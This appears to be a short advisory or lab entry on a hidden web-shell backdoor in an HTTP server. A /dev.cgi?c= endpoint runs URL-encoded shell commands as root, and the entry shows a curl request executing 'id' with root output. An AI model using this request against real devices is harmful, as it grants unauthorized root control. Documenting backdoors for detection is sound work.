- Type: hidden command
- Affected versions: 3.04.06 - 3.04.13
The /dev.htm web page creates a web-shell that makes requests to the /dev.cgi endpoint, of the
form /dev.cgi?c=<cmd> where cmd is an url-encoded shell command that will be executed as root.
We first need to copy the www/ directory to /tmp/www/:
$ cp -r www/ /tmp/We can then start up the HTTP server (e.g., with the backdoored variant):
$ ./backdoored/src/build/httpdIn a separate terminal, we can try running a shell command via the backdoor (e.g., id):
$ curl -v "http://localhost:8080/dev.cgi?c=id"
...
uid=0(root) gid=0(root) groups=0(root)
...So we can see that the backdoor allows us to run arbitrary shell commands as root.